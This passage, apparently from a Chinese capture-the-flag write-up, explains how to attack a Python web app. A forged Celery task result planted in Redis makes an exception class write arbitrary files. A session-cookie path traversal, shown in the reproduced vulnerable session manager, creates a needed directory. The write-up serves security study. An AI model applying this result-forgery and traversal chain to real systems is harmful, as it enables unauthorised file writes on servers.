                return base64.b64decode(data)
            return data.encode(encoding)
        return bytes(data)

    def _ensure_text(self, data: Any, encoding: str) -> str:
        """Convert ``data`` to text, base64-decoding strings when requested."""
        if isinstance(data, str):
            if encoding == "base64":
                return base64.b64decode(data).decode("utf-8", errors="ignore")
            return data
        if isinstance(data, bytes):
            return data.decode(encoding, errors="ignore")
        return str(data)

于是可以往 Redis 里面写入一个任务的执行结果,status 设置为 FAILURE,result 如下设置:

1
2
3
4
5
6
7
8
9
10
{
"exc_type": "DiagnosticsPersistError",
"exc_message": json.dumps(
{
"path": "/tmp/test",
"content": "123",
}
),
"exc_module": "framework.app",
}

通过 task_result 接口查询该任务的执行结果时,DiagnosticsPersistError 就会被实例化,在 /tmp/debug 存在的情况下,/tmp/test 会被写入 123

接着需要解决的问题是如何创建 /tmp/debug

注意到框架处理 Session 时存在目录穿越漏洞,当 sid 中存在 ../ 时,Session 文件会从 self.directory 中穿越出去,由此可以创建 /tmp/debug

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
# Stores each session as one JSON file inside `directory`; the file name is the
# session id taken from the session cookie.
class FileSessionManager:
"""Manage loading and storing of file-based sessions."""

# Keeps the configuration and creates the session directory if it is missing.
# `secret` is stored as bytes; no method visible in this class reads it.
def __init__(self, secret: str = "devsecret", directory: str = "/tmp/sess", cookie_name: str = "mini_session", nonce_bytes: int = 8) -> None:
self.secret = secret.encode() if isinstance(secret, str) else secret
self.directory = directory
self.cookie_name = cookie_name
self.nonce_bytes = nonce_bytes
os.makedirs(self.directory, exist_ok=True)

# -- public API -----------------------------------------------------
# Builds the session for a request from the file named by its sid.
def load_session(self, request: Request) -> FileSession:
sid, created = self._get_or_create_sid(request)
data = self._read(sid) or {}
# The sid is passed twice to FileSession; the session is "new" when no data was read.
session = FileSession(self, sid, sid, data=data, new=not bool(data))
# Only a freshly generated sid flags the cookie for an update.
session.cookie_needs_update = created
return session

# Persists a modified session; unmodified sessions are not written.
def save(self, session: FileSession) -> None:
if not session.modified:
return
path = self._session_path(session.sid)
# Write to a randomly suffixed temp file next to the target, then move it
# over the target with os.replace().
tmp_path = f"{path}.tmp-{secrets.token_hex(4)}"
payload = {key: value for key, value in session.items()}
with open(tmp_path, "w", encoding="utf-8") as fh:
json.dump(payload, fh, ensure_ascii=False, separators=(",", ":"))
os.replace(tmp_path, path)
session.modified = False

# The cookie value is the session's nonce.
def get_cookie_value(self, session: FileSession) -> str:
return session.nonce

# -- internal helpers ----------------------------------------------
# Returns (sid, created): the cookie's sid when it is usable, else a new random hex sid.
def _get_or_create_sid(self, request: Request) -> tuple[str, bool]:
raw = request.cookies.get(self.cookie_name)
if raw:
sid = self._normalize_sid(raw)
if sid:
return sid, False
sid = secrets.token_hex(self.nonce_bytes)
return sid, True

# Strips surrounding whitespace and truncates to 256 characters.
# NOTE(review): nothing here rejects "/" or ".." in the client-supplied value.
def _normalize_sid(self, value: str) -> str | None:
sid = value.strip()
if not sid:
return None
if len(sid) > 256:
sid = sid[:256]
return sid

# Loads the session JSON; a missing or unparsable file yields None.
def _read(self, sid: str) -> Optional[Dict[str, Any]]:
path = self._session_path(sid)
try:
with open(path, "r", encoding="utf-8") as fh:
return json.load(fh)
except FileNotFoundError:
return None
except json.JSONDecodeError:
return None

# NOTE(review): the sid is joined to the directory unchanged, so a sid
# containing "../" (or an absolute path) resolves outside self.directory.
def _session_path(self, sid: str) -> str:
return os.path.join(self.directory, f"{sid}")

http://gensokyo.cn/2025/10/19/celerace/